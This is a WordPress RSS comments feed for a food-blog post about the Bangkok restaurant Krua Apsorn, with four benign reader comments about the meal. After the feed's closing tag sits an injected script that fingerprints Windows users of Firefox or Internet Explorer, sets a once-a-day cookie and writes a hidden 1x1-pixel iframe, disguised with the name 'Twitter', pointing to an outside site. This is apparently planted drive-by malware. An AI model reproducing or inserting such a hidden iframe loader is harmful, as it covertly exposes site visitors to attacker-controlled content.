<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Krua Apsorn</title>
	<atom:link href="http://www.austinbushphotography.com/2009/05/krua-apsorn-2.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/krua-apsorn-2.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Peter Chong</title>
		<link>http://www.austinbushphotography.com/blog/krua-apsorn-2.html#comment-22124</link>
		<dc:creator>Peter Chong</dc:creator>
		<pubDate>Wed, 10 Jun 2009 03:43:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/05/krua-apsorn-2.html#comment-22124</guid>
		<description>I put in a comment at your earlier post...this is one fantastic meal. I also had similar dishes as you ordered.

http://shiokhochiak.blogspot.com/2009/03/krua-apsom-princess-chef-cooks-for-us.html</description>
		<content:encoded><![CDATA[<p>I put in a comment at your earlier post&#8230;this is one fantastic meal. I also had similar dishes as you ordered.</p>
<p><a href="http://shiokhochiak.blogspot.com/2009/03/krua-apsom-princess-chef-cooks-for-us.html" rel="nofollow">http://shiokhochiak.blogspot.com/2009/03/krua-apsom-princess-chef-cooks-for-us.html</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Robert Danhi</title>
		<link>http://www.austinbushphotography.com/blog/krua-apsorn-2.html#comment-21796</link>
		<dc:creator>Robert Danhi</dc:creator>
		<pubDate>Wed, 03 Jun 2009 04:50:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/05/krua-apsorn-2.html#comment-21796</guid>
		<description>EVERYTIME I go to Bangkok I go here, Khun Ning from Khao Cooking School (where we met) brought me there the first time.  Aroy maak maak</description>
		<content:encoded><![CDATA[<p>EVERYTIME I go to Bangkok I go here, Khun Ning from Khao Cooking School (where we met) brought me there the first time.  Aroy maak maak</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Austin Bush</title>
		<link>http://www.austinbushphotography.com/blog/krua-apsorn-2.html#comment-21345</link>
		<dc:creator>Austin Bush</dc:creator>
		<pubDate>Wed, 27 May 2009 14:42:32 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/05/krua-apsorn-2.html#comment-21345</guid>
		<description>Well, Hock was there, and he can vouch that it was a decent, but unspectacular meal. Today&#039;s meal w/ David (Hock didn&#039;t take part in this one) was much better -- will blog on it soon.

And re. your simple pasta dish, there&#039;s no need to be ashamed; all of us occasionally succumb to the desire to eat rustic peasant fare.

Heh heh....</description>
		<content:encoded><![CDATA[<p>Well, Hock was there, and he can vouch that it was a decent, but unspectacular meal. Today&#8217;s meal w/ David (Hock didn&#8217;t take part in this one) was much better &#8212; will blog on it soon.</p>
<p>And re. your simple pasta dish, there&#8217;s no need to be ashamed; all of us occasionally succumb to the desire to eat rustic peasant fare.</p>
<p>Heh heh&#8230;.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Maylee</title>
		<link>http://www.austinbushphotography.com/blog/krua-apsorn-2.html#comment-21250</link>
		<dc:creator>Maylee</dc:creator>
		<pubDate>Tue, 26 May 2009 04:12:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/05/krua-apsorn-2.html#comment-21250</guid>
		<description>ok I am green with envy

I just had tagleatelle with smoked trout, dill, chilli, lemon, garlic and fresh goats cheese for lunch

so there</description>
		<content:encoded><![CDATA[<p>ok I am green with envy</p>
<p>I just had tagleatelle with smoked trout, dill, chilli, lemon, garlic and fresh goats cheese for lunch</p>
<p>so there</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

